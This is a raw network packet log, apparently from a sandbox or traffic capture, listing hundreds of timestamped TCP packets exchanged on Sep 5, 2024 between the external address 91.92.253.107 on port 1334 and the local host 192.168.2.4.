Sep 5, 2024 20:25:29.775561094 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775569916 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775583029 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775589943 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775593042 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775598049 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775600910 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775612116 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775615931 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775634050 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775691986 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775701046 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775702953 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775711060 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775721073 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775732040 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775753021 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775759935 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775769949 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775773048 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775774956 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775778055 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775787115 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775790930 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775804996 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775813103 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775830030 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775907993 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.775947094 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775955915 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775963068 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775970936 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775979996 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775983095 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775990963 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.775998116 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776017904 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776021957 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776026964 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776035070 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776042938 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776092052 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776129007 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776139021 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776145935 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776154041 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776163101 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776185989 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776209116 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776283979 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776290894 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776293993 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776303053 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776310921 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776319027 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776345968 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776390076 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776398897 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776411057 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776417017 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776420116 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776427984 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776432037 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776437044 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776453972 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776462078 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776468039 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776510954 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776520014 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776523113 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776526928 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776540995 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776560068 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776582003 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776591063 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776616096 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776618958 CEST	49732	1334	192.168.2.4	91.92.253.107
Sep 5, 2024 20:25:29.776639938 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776648045 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776655912 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776665926 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776674032 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776694059 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776738882 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776747942 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776755095 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776807070 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776814938 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776823044 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776853085 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776860952 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776876926 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776935101 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.776942968 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777034998 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777043104 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777050018 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777069092 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777077913 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777086020 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777093887 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777102947 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777142048 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777148962 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777160883 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777169943 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777173042 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777179003 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777189970 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777198076 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777215958 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777224064 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777231932 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777299881 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777396917 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777451992 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777461052 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777494907 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777503967 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777512074 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777523994 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777532101 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777601957 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777610064 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777617931 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777626991 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777748108 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777791023 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777798891 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777807951 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777844906 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777853012 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777930021 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777937889 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777945995 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777955055 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.777991056 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778000116 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778006077 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778013945 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778022051 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778081894 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778090954 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778099060 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778125048 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778134108 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778141022 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778148890 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778237104 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778247118 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778254032 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778316021 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778347015 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778354883 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778382063 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778465986 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778486967 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778512955 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778522015 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778534889 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778542995 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778551102 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778671026 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778733015 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778762102 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778770924 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778784990 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778816938 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778825998 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778832912 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778867960 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778876066 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778908968 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778917074 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778924942 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.778933048 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779046059 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779053926 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779061079 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779069901 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779078007 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779087067 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779165983 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779175043 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779181004 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779189110 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779282093 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779290915 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779298067 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779306889 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779395103 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779402971 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779409885 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779418945 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779427052 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779443026 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779552937 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779561996 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779567957 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779576063 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779747963 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779804945 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779854059 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779863119 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779937029 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779946089 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779954910 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.779969931 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780006886 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780014992 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780081034 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780112982 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780122042 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780124903 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780200958 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780208111 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780215979 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780261040 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780270100 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780277014 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780297041 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780416965 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780425072 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780431986 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780438900 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780442953 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780451059 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780458927 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780534029 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780541897 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780553102 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780567884 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780625105 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780633926 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780641079 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780651093 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780659914 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780675888 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780705929 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780714989 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780760050 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780812979 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780858994 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780903101 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780910969 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780919075 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.780987024 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781019926 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781028032 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781053066 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781086922 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781095028 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781126976 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781199932 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781208992 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781308889 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781317949 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781387091 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781398058 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781452894 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781547070 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781560898 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781622887 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781630993 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781696081 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781743050 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781750917 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781759977 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781847954 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781856060 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781861067 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781934023 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781943083 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781969070 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781977892 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781985998 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.781996012 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782004118 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782013893 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782068014 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782078028 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782084942 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782094955 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782104015 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782196045 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782250881 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782258987 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782268047 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782355070 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782362938 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782406092 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782442093 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782450914 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782532930 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782541990 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782550097 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782557964 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782567024 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782573938 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782581091 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782665968 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782674074 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782680988 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782690048 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782702923 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782711983 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782762051 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782771111 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782773972 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782779932 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782788992 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782798052 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782901049 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782908916 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782917976 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782929897 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782938004 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.782944918 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783016920 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783025026 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783031940 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783040047 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783050060 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783058882 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783066988 CEST	1334	49732	91.92.253.107	192.168.2.4
Sep 5, 2024 20:25:29.783076048 CEST	1334	49732	91.92.253.107	192.168.2.4
